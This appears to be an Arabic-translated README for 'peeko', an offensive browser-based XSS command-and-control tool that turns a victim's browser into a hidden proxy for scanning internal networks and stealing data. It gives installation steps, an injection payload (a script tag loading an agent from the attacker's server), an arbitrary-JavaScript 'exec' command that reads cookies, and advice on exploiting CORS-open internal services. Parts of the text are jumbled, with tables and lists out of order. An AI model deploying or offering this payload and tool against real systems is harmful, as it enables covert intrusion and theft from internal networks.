
peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.
الإصدار: v1.1
peeko هي أداة C2 (التحكم والسيطرة) مبنية على المتصفح وتعمل عبر XSS، وتستغل متصفح الضحية كوسيط خفي داخل الشبكات الداخلية.
عبر حمولة XSS محقونة، يُنشئ peeko اتصال WebSocket بخادم مركزي، مما يسمح للمهاجم بالتحكم عن بُعد في متصفح الضحية لإرسال طلبات إلى الخدمات الداخلية، وفحص الشبكات، وسرقة البيانات، أو حتى تنفيذ أكواد JavaScript عشوائية — كل ذلك دون إنزال أي ملف ثنائي.
.txt أو .jsonاستنسخ المستودع:
git clone https://github.com/b3rito/peeko.git
cd peeko
ثبّت التبعيات:
make install
(اختياري) اجعل السكربتات قابلة للتنفيذ:
chmod +x gen-cert.sh start.sh
أنشئ شهادة TLS موقّعة ذاتيًا:
make cert
استبدل النص المؤقت SERVER-IP:
افتح وعدّل الملفات التالية:
static/agent.jsstatic/control.htmlاستبدل SERVER-IP بعنوان IP/نطاق الخادم الخاص بك:
wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
شغّل الخادم:
make run
افتح لوحة التحكم في متصفحك:
https://192.168.30.136:8443/static/control.html
192.168.1.0/24, 10.0.0.10-20، إلخ.80، 443,8000-8080)exec:... للإرسالexec:alert(document.cookie);.txt أو .jsonتؤثر سياسات المتصفحات الحديثة على ما يمكن أن يصل إليه peeko.
| الترويسة | هل يمكن قراءة المحتوى؟ | ملاحظات |
|---|---|---|
Access-Control-Allow-Origin: * | ✅ | وصول كامل إلى الاستجابة |
| بدون ترويسة | ⚠️ | الاستجابة معتمة (opaque) |
يتصل الضحية عبر HTTPS. إذا كان الهدف المفحوص يستخدم HTTP فقط:
http://أثناء اختبار الاختراق، إذا وجدت خدمة داخلية تستجيب بـ Access-Control-Allow-Origin: * وتُقدَّم عبر HTTPS، فإن peeko يصبح وكيلًا خفيًا قادرًا على سرقة البيانات الداخلية مباشرة من متصفح الضحية دون إنزال أي ملفات أو فتح اتصالات خارجية.
peeko/
├── main.py → FastAPI WebSocket server
├── start.sh → Launch server
├── gen-cert.sh → Generate self-signed TLS certificate
├── Makefile → Install/run helpers
├── requirements.txt → Python dependencies
├── certs/ → TLS key and cert will be stored here
└── static/ → Browser client assets
├── control.html → Control panel (was attacker.html)
├── infect.html → Victim landing page
└── agent.js → Victim agent script
هذه الأداة مقدمة لأغراض تعليمية واختبارية مصرح بها فقط.
أي استخدام لـ peeko خارج البيئات التي لديك فيها إذن صريح محظور تمامًا.
أنت مسؤول عن أفعالك.
كتبها b3rito من mes3hacklab و GioPpeTto
احقن الوكيل (مثال XSS):
<script src="https://192.168.30.136:8443/static/agent.js"></script>
| أصل مقيد |
| ❌ |
| محجوب أو غير قابل للقراءة |